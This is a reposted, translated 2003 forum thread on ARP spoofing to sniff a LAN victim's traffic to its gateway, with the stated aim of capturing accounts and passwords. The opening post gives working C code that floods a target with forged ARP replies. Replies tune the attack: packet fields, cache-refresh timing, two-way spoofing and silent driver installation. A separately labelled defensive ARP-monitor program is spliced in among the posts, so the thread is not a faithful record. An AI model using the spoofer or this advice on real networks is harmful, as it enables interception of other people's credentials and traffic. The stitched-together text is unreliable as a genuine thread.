Talking about using ARP spoofing to achieve sniffing (cool article, with replies)


Nethorse

Published in: 2003-12-10 14:11 Reply Posting: 47 Points: 0 Registration: 2003-02-12

Talking about using ARP spoofing to achieve sniffing. Suppose hosts A, B and C are in the same LAN, and the gateway is G. A and C are the hosts to be listened to, and B is our machine. Most current tools work by deceiving A about the MAC of hosts other than A that it communicates with, such as C, so that their communication can be monitored. But in fact, in most cases we are interested in the communication with the gateway G, and in particular in some information such as accounts and passwords; what data is sent to A we don't care much about. So in this case there is no need to deceive the gateway G (i.e. tell G that A's MAC is B's). We only deceive host A, telling it that the MAC of the gateway G is B's. In this way the communication between A and G becomes:

    A -------> B -------> G
    A <------------------ G

Obviously, if the amounts of data sent and received are comparable, then the data passing through B is almost halved, and of course the burden on the network bandwidth and on host B is also reduced.

The code was implemented on XP with VC6.0, and the deceived host is also XP (this machine needs to have IP routing enabled):

    #include <stdio.h>
    #include <stdlib.h>
    #include <windows.h>
    #include <pcap.h>
    #pragma comment(lib, "wpcap")

    int main(int argc, char **argv)
    {
        pcap_if_t *alldevs, *d;
        pcap_t *fp;
        char errbuf[PCAP_ERRBUF_SIZE];
        u_char packet[60];
        int i = 0, inum;

        /* retrieve the device list */
        if (pcap_findalldevs(&alldevs, errbuf) == -1) {
            fprintf(stderr, "error in pcap_findalldevs: %s\n", errbuf);
            exit(1);
        }

        /* print the list */
        for (d = alldevs; d; d = d->next) {
            printf("%d. %s", ++i, d->name);
            if (d->description)
                printf(" (%s)\n", d->description);
            else
                printf(" (no description available)\n");
        }

        if (i == 0) {
            printf("\nno interfaces found! make sure WinPcap is installed.\n");
            return -1;
        }

        printf("Enter the interface number (1-%d): ", i);
        scanf("%d", &inum);

        if (inum < 1 || inum > i) {
            printf("\ninterface number out of range.\n");
            /* free the device list */
            pcap_freealldevs(alldevs);
            return -1;
        }

        /* jump to the selected adapter */
        for (d = alldevs, i = 0; i < inum - 1; d = d->next, i++);

        /* open the output adapter */
        if ((fp = pcap_open_live(d->name, 60, 1, 1000, errbuf)) == NULL) {
            fprintf(stderr, "\nerror opening adapter: %s\n", errbuf);
            pcap_freealldevs(alldevs);
            return -1;
        }
        pcap_freealldevs(alldevs);

        /* Ethernet destination: mac of the target you want to spoof */
        packet[0] = 0x00; packet[1] = 0x00; packet[2] = 0x00;
        packet[3] = 0x00; packet[4] = 0x00; packet[5] = 0x00;
        /* Ethernet source: mac of your host */
        packet[6] = 0x00; packet[7] = 0x00; packet[8] = 0x00;
        packet[9] = 0x00; packet[10] = 0x00; packet[11] = 0x00;
        /* set the protocol type (0x0806 = ARP) */
        packet[12] = 8; packet[13] = 6;
        /* set the hardware type (1 = Ethernet) and protocol type (0x0800 = IP) */
        packet[14] = 0; packet[15] = 1; packet[16] = 8; packet[17] = 0;
        /* set the hardware and protocol address lengths */
        packet[18] = 6; packet[19] = 4;
        /* set the operation type (2 = ARP reply) */
        packet[20] = 0; packet[21] = 2;
        /* sender hardware address: mac of your host */
        packet[22] = 0x00; packet[23] = 0x00; packet[24] = 0x00;
        packet[25] = 0x00; packet[26] = 0x00; packet[27] = 0x00;
        /* sender protocol address: ip of the gateway */
        packet[28] = 0; packet[29] = 0; packet[30] = 0; packet[31] = 0;
        /* target hardware address: mac of the target */
        packet[32] = 0x00; packet[33] = 0x00; packet[34] = 0x00;
        packet[35] = 0x00; packet[36] = 0x00; packet[37] = 0x00;
        /* target protocol address: ip of the target you want to spoof */
        packet[38] = 0; packet[39] = 0; packet[40] = 0; packet[41] = 0;
        /* fill the rest of the packet */
        for (i = 42; i < 60; i++) {
            packet[i] = 0;
        }

        /* send down the packet */
        while (1) {
            Sleep(2000);
            pcap_sendpacket(fp, packet, 60);
        }
        return 0;
    }

Attached note: how to implement ARP spoofing probably has no fixed rule across different networks. I am using XP SP1 Professional. If the sender IP of the ARP reply is not the gateway's IP, the ARP cache is not updated; in the program it is exactly the IP of the gateway.

Nethorse edited at 2003-12-10 14:15

--- I don't have a laptop, I want one!

Love1983

Published in: 2003-12-11 03:30 Reply Posting: 163 Points: 0 Registration: 2003-08-16

Bookmarked. Learning...

--- Life and study should be passionate; otherwise you can't experience the fullest joy and pain.

PRFONE

Published in: 2003-12-11 08:25 Reply Posting: 812 Points: 0 Registration: 2002-01-11

If G -----> A communicate frequently, then in A's ARP cache the correspondence between the gateway IP and MAC will keep changing between IP <---> B's MAC and IP <---> G's MAC, causing the A ---> B ---> G communication to be not very smooth. Don't know whether you have met this?

--- The edge of the edge is self-contained. . .

Nethorse

Published in: 2003-12-11 08:43 Reply Posting: 47 Points: 0 Registration: 2003-02-12

Quote (prfone @ 2003-12-11 08:25)

If G -----> A communicate frequently, then in A's ARP cache the correspondence between the gateway IP and MAC will keep changing between IP <---> B's MAC and IP <---> G's MAC, causing the A ---> B ---> G communication to be not very smooth. Don't know whether you have met this?

The normal communication of G ----> A does not change the correspondence between the gateway IP and MAC in A's ARP cache, unless G sends ARP requests. But from what the sniffer shows (in my LAN; different LANs may be different), G does not send ARP requests frequently, and we can adjust the interval at which the spoofed packets are sent to A. Even if during this period the correspondence between the gateway IP and MAC in A's ARP cache keeps changing between B's MAC and G's MAC, because ARP is just a link layer protocol, the normal communication between A and G is not affected; B just occasionally loses a few datagrams sent by A.

--- I don't have a laptop, I want one!

PRFONE

Published in: 2003-12-11 09:24 Reply Posting: 812 Points: 0 Registration: 2002-01-11

My LAN gateway is a Linux PC. I found that it sends ARP requests very often; I don't know whether its ARP cache timeout has any effect. I don't know what system your gateway is?

--- The edge of the edge is self-contained. . .

PRFONE

Published in: 2003-12-11 09:34 Reply Posting: 812 Points: 0 Registration: 2002-01-11

When the whole LAN is busy, for example when gateway G needs to resolve the MAC of another LAN machine D, G broadcasts an ARP request. Then A also receives G's request, compares the correspondence between G's IP and MAC, discovers G's IP -> B's MAC, and updates its ARP cache. In this way, doesn't the correspondence for G in the ARP cache change?

--- The edge of the edge is self-contained. . .

XMHP

Published in: 2003-12-12 09:45 Reply Posting: 79 Points: 0 Registration: 2002-07-09

Under the same subnet, ARP spoofing can succeed. But how do you carry out ARP spoofing across different subnets?

FOLLOW

Published in: 2003-12-13 16:48 Reply Posting: 113 Points: 0 Registration: 2003-01-04

It is said that you can try it with ICMP redirection; try it when you have time.

--- Listening to the spring rain all night in a small tower; tomorrow morning apricot blossoms will be sold in the deep alley.

yiedu

Published in: 2003-12-17 13:49 Reply Posting: 446 Points: 0 Registration: 2003-03-25

The principle of ARP spoofing everyone knows, but some details have not been pointed out. PRFONE's problem is very typical; I have also encountered similar problems, and the reason has been unclear. Let me describe it, and I hope everyone will discuss it. First, I have already deceived A, and observing the MAC in its cache table, it really is already my MAC, but when I browse the Internet with IE on A, B is not able to capture A's packets. Know why? Note that B has been set to promiscuous mode. Possible cause: when A establishes a connection request, an ARP request is sent to the gateway, so the cache is changed immediately, even if my spoofing speed on B is very fast. There is another phenomenon: when A sends packets to an IP in the intranet, B can capture A's data. When I use IE, I can't catch it. Very strange?

--- Nostalgic lights, fallen leaves, and an old guitar sound. The girl I loved but didn't have the courage to tell, are you OK?

PRFONE

Published in: 2003-12-17 14:12 Reply Posting: 812 Points: 0 Registration: 2002-01-11

YIEDU, what is your router really? A Cisco? You can analyze A's ARP packets by capturing them!

--- The edge of the edge is self-contained. . .

FFantasyd

Published in: 2003-12-17 16:49 Reply Posting: 61 Points: 0 Registration: 2003-09-19

Following yiedu's question.

--- Chongqing Network Security Group, Tiger League Network Security Group. My homepage

Xtiger

Published in: 2003-12-17 18:04 Reply Posting: 139 Points: 0 Registration: 2002-10-25

Quote (YieEDU @ 2003-12-17 13:49)

The principle of ARP spoofing everyone knows, but some details have not been pointed out. PRFONE's problem is very typical; I have also encountered similar problems, and the reason has been unclear. Let me describe it, and I hope everyone will discuss it. First, I have already deceived A, and observing the MAC in its cache table, it really is already my MAC, but when I browse the Internet with IE on A, B is not able to capture A's packets. Know why? Note that B has been set to promiscuous mode. Possible cause: when A establishes a connection request, an ARP request is sent to the gateway, so the cache is changed immediately, even if my spoofing speed on B is very fast. There is another phenomenon: when A sends packets to an IP in the intranet, B can capture A's data. When I use IE, I can't catch it. Very strange?

Look at it, it seems I have encountered a similar situation; quite a hassle. A real ArpSpoof should be full-duplex, not half-duplex. Only in this way is the transfer of the entire data stream guaranteed to be smooth. And what you describe matches exactly the half-duplex phenomenon.

Xtiger edited at 2003-12-17 18:47

Sparrow1

Published in: 2003-12-17 20:21 Reply Posting: 52 Points: 0 Registration: 2003-10-26

Following YIEDU's question, and I recommend capturing A's packets and carefully analysing the reason. In addition, doesn't the full duplex mentioned by Xtiger refer to two-way deception and forwarding? I think this can guarantee the integrity of the data communication. I haven't tried it specifically, but I saw "ARP Protocol Revealed" on the front page a couple of days ago and understood it, I hope.

ISXIAOBAI

Published in: 2003-12-18 01:25 Reply Posting: 40 Points: 0 Registration: 2003-11-16

Quote (Yiedu @ 2003-12-17 13:49)

The principle of ARP spoofing everyone knows, but some details have not been pointed out. PRFONE's problem is very typical; I have also encountered similar problems, and the reason has been unclear. Let me describe it, and I hope everyone will discuss it. First, I have already deceived A, and observing the MAC in its cache table, it really is already my MAC, but when I browse the Internet with IE on A, B is not able to capture A's packets. Know why? Note that B has been set to promiscuous mode. Possible cause: when A establishes a connection request, an ARP request is sent to the gateway, so the cache is changed immediately, even if my spoofing speed on B is very fast. There is another phenomenon: when A sends packets to an IP in the intranet, B can capture A's data. When I use IE, I can't catch it. Very strange?

YIEDU, regarding your question, let me give my opinion. The problem I encountered was that, after successfully deceiving a host and the gateway, using the sniffer I could get the packets the gateway sent to the host, but not the packets the host sent out. However, I solved it later. In fact it is like this: it is definitely your program, that is, there is a problem with the ARP packet you send to the host. The ARP packet sent to the target host should be as follows. First the physical header: target host MAC, native MAC, 0806 (ARP type). Then the ARP header; the rest of it is not important, I will only say how the addresses are filled in: Sender's hardware address is this machine's MAC, Sender's IP address is the gateway IP (mainly this), Target's hardware address is the target host's MAC, Sender's IP address is the target host IP. As long as these are filled in, you will definitely receive all the packets of the other host. As for the problem of receiving the packets issued by the host, I think it is a problem in your program. For the first question, there is also a problem in the program. Later I investigated for a long time and found, from the ARP packets I captured, that the ARP packet sent to the host could not make it redirect, while the one sent to the gateway had no problem, so only part of the datagrams, those from the gateway, were obtained. It is recommended that you check the ARP list of the target host and see whether the physical address corresponding to the gateway IP address is your MAC; if not, there is no deception, and then it is definitely a problem with the ARP packet. My thoughts are like this, Yiedu; if you still have not solved it, you can talk to me. In addition, my network environment is: a Cisco Catalyst 1900 switch, two hosts both running Windows 2K Pro. My program sends ARP packets to both the gateway and the target host.

I spent two hours debugging the ARP spoofing program; it's two o'clock, it seems I have to go, huh huh. btw: the xiaobai ID still hasn't been found, I have to use the Isxiaobai alt account for now; it's just very cold these days, hey. Dear SAN, when can I find you and get my ID back?

Edited by ISXIAobai

ISXIAobai

Published in: 2003-12-18 02:32 Reply Posting: 40 Points: 0 Registration: 2003-11-16

Quote (prfone @ 2003-12-11 09:24)

My LAN gateway is a Linux PC. I found that it sends ARP requests very often; I don't know whether its ARP cache timeout has any effect. I don't know what system your gateway is?

Old brother, I also want to mention a little idea to you. I also wrote an ARP deception program and found that the other host will automatically refresh its ARP cache; of course mine are all 2K systems, I'm just fumbling around, hey. So, no matter how often your gateway refreshes, as long as you are fast enough you can guarantee that the target host sends data through you. As long as you keep sending ARP packets and let the other party update, it works. About the format of the ARP packet, I wrote it above for Yiedu. By the way, many ARP programs on the Internet have some problems; I had some of the problems Yiedu mentioned. You have to check carefully whether the ARP packet really is what we want, huh huh.

Isxiaobai

Published in: 2003-12-18 07:46 Reply Posting: 40 Points: 0 Registration: 2003-11-16

Borrowing this post to ask, by the way, a question I have encountered: I used WinPcap to implement ARP deception, successfully. It also captured the packets of the deceived host with Iris. Since I had previously written a sniffing tool implemented with SockRaw, I was too lazy to rewrite the code and used it directly. In fact, after using WinPcap I used SockRaw to grab the packets, but here is the problem: I didn't expect WinPcap to conflict with SockRaw; with the two together, the machine blue-screens. Have you had this situation, and how do you solve it? Incidentally, there is another problem, about WinPcap: how can I install WinPcap with my own program, without running its graphical installer?

Narcissus

Published in: 2003-12-18 08:35 Reply Posting: 5 Points: 0 Registration: 2003-12-11

Quote (isxiaobai @ 2003-12-18 02:32)

So, no matter how often your gateway refreshes, as long as you are fast enough you can guarantee that the target host sends data through you. As long as you keep sending ARP packets and let the other party update, it works.

No matter how fast your refresh is, there is still a gap in between. If the target machine receives the gateway's ARP packet in this gap, then in this gap it is not deceived.

--- My ideal is a hero; one day he will step on seven-colored clouds to marry me. I guessed the beginning, but I couldn't guess this ending...
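As an added example that is not part of any post in this thread: the ARP reply layout Isxiaobai describes (Ethernet header, then hardware and protocol types, address lengths, opcode, and the sender/target address pairs) is exactly what a defender can parse to spot the gateway IP-to-MAC flips PRFONE and Narcissus argue about. The C program below, written for this edit, parses raw frames, compares the MAC the wire currently claims for the gateway IP against a trusted MAC the operator configured, and counts both flips and replies that bind the gateway IP to an untrusted MAC. All addresses, and the small frame builder used only to produce sample input, are constructed for the demo and come neither from the thread nor from any real network.

```c
/* Added example, not code from the thread: a defender-side ARP monitor that
 * watches the gateway's IP-to-MAC binding for the oscillation the posts describe. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define ETH_HDR_LEN  14
#define ARP_LEN      28
#define FRAME_LEN    60   /* minimum Ethernet frame, as in the thread's sender */
#define ARP_OP_REPLY 2

struct arp_info {
    uint16_t htype, ptype, oper;
    uint8_t  hlen, plen, sha[6], spa[4], tha[6], tpa[4];
};

/* Parse one Ethernet frame; returns 1 if it carries a well-formed Ethernet/IPv4 ARP message. */
int parse_arp(const uint8_t *frame, size_t len, struct arp_info *out)
{
    const uint8_t *a;
    if (len < ETH_HDR_LEN + ARP_LEN) return 0;
    if (frame[12] != 0x08 || frame[13] != 0x06) return 0;  /* EtherType 0x0806 = ARP */
    a = frame + ETH_HDR_LEN;
    out->htype = (uint16_t)((a[0] << 8) | a[1]); out->ptype = (uint16_t)((a[2] << 8) | a[3]);
    out->hlen = a[4]; out->plen = a[5]; out->oper = (uint16_t)((a[6] << 8) | a[7]);
    if (out->htype != 1 || out->ptype != 0x0800 || out->hlen != 6 || out->plen != 4) return 0;
    memcpy(out->sha, a + 8, 6);  memcpy(out->spa, a + 14, 4);  /* sender MAC, sender IP */
    memcpy(out->tha, a + 18, 6); memcpy(out->tpa, a + 24, 4);  /* target MAC, target IP */
    return 1;
}

/* State for one protected IP: the MAC the operator trusts for it, and the MAC the wire last claimed. */
struct gw_monitor {
    uint8_t gw_ip[4], trusted_mac[6], current_mac[6];
    int flips;   /* how often the claimed MAC changed (the oscillation in the thread) */
    int alerts;  /* replies that bound the gateway IP to an untrusted MAC */
};

void monitor_init(struct gw_monitor *m, const uint8_t gw_ip[4], const uint8_t trusted_mac[6])
{
    memset(m, 0, sizeof *m);
    memcpy(m->gw_ip, gw_ip, 4);
    memcpy(m->trusted_mac, trusted_mac, 6);
    memcpy(m->current_mac, trusted_mac, 6);
}

/* Feed one frame. Returns 0 (irrelevant or unchanged), 1 (binding flipped to an
 * untrusted MAC: spoof suspected) or 2 (binding flipped back to the trusted MAC). */
int monitor_frame(struct gw_monitor *m, const uint8_t *frame, size_t len)
{
    struct arp_info ai;
    if (!parse_arp(frame, len, &ai) || ai.oper != ARP_OP_REPLY) return 0;
    if (memcmp(ai.spa, m->gw_ip, 4) != 0) return 0;        /* reply is not about the gateway IP */
    if (memcmp(ai.sha, m->current_mac, 6) == 0) return 0;   /* same claim as last time */
    m->flips++;
    memcpy(m->current_mac, ai.sha, 6);
    if (memcmp(ai.sha, m->trusted_mac, 6) != 0) { m->alerts++; return 1; }
    return 2;
}

/* Constructed test input only: builds an ARP reply with the byte layout the thread gives. */
void make_arp_reply(uint8_t *f, const uint8_t dst[6], const uint8_t src[6],
                    const uint8_t sha[6], const uint8_t spa[4],
                    const uint8_t tha[6], const uint8_t tpa[4])
{
    static const uint8_t arp_hdr[8] = {0, 1, 8, 0, 6, 4, 0, ARP_OP_REPLY};
    memset(f, 0, FRAME_LEN);
    memcpy(f, dst, 6);       memcpy(f + 6, src, 6);
    f[12] = 0x08;            f[13] = 0x06;
    memcpy(f + 14, arp_hdr, 8);
    memcpy(f + 22, sha, 6);  memcpy(f + 28, spa, 4);
    memcpy(f + 32, tha, 6);  memcpy(f + 38, tpa, 4);
}

/* Replays the sequence the thread describes: G's genuine reply, B's forged reply claiming
 * G's IP, G's genuine reply again (the "gap"), then B's again. Returns the alert count. */
int run_demo(void)
{
    const uint8_t ip_g[4] = {192, 168, 1, 1}, ip_a[4] = {192, 168, 1, 10};  /* constructed */
    const uint8_t mac_g[6] = {0x02, 0, 0, 0, 0, 0x01};   /* constructed gateway MAC */
    const uint8_t mac_a[6] = {0x02, 0, 0, 0, 0, 0x0a};   /* constructed victim MAC */
    const uint8_t mac_b[6] = {0x02, 0, 0, 0, 0, 0x0b};   /* constructed spoofer MAC */
    const uint8_t *claims[4] = {mac_g, mac_b, mac_g, mac_b};
    uint8_t frame[FRAME_LEN];
    struct gw_monitor m;
    int i, r;
    monitor_init(&m, ip_g, mac_g);
    for (i = 0; i < 4; i++) {
        make_arp_reply(frame, mac_a, claims[i], claims[i], ip_g, mac_a, ip_a);
        r = monitor_frame(&m, frame, FRAME_LEN);
        if (r == 1) printf("frame %d: gateway IP now claimed by untrusted MAC ...:%02x\n", i, claims[i][5]);
        else if (r == 2) printf("frame %d: binding reverted to the trusted gateway MAC\n", i);
    }
    printf("flips=%d alerts=%d\n", m.flips, m.alerts);
    return m.alerts;
}

int main(void) { return run_demo() == 2 ? 0 : 1; }
```

The monitor only trusts a binding the operator configured up front; a first-seen MAC would be fooled by a spoofer that gets its reply in before the gateway's. In a real deployment the frames would come from a capture handle and the trusted MAC from inventory, and an alert rate that rises and falls with the spoofer's send interval is the signature of the half-duplex setup described above.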

Isxiaobai

Published in: 2003-12-18 08:47 Reply Posting: 40 Points: 0 Registration: 2003-11-16

Oops, the gap is certain, but it is only a short period of time; most of the datagrams still pass through me, and moreover it does not affect the target machine. The ARP cache has no effect on the target; it just bypasses me for a moment.

Sparrow1

Published in: 2003-12-18 10:06 Reply Posting: 52 Points: 0 Registration: 2003-10-26

isxiaobai, did you really stay up all night? Pay attention to your health!

Isxiaobai

Published in: 2003-12-18 10:14 Reply Posting: 40 Points: 0 Registration: 2003-11-16

Nothing, I'm used to it.

PRFONE

Published in: 2003-12-18 11:21 Reply Posting: 812 Points: 0 Registration: 2002-01-11

1. Use WinPcap to rewrite your sniffer. 2. I think the NPF.sys driver is installed as a service; copy the DLL to the system directory and it should work.

--- The edge of the edge is self-contained. . .

Please credit the original address when reposting: https://www.9cbs.com/read-95593.html
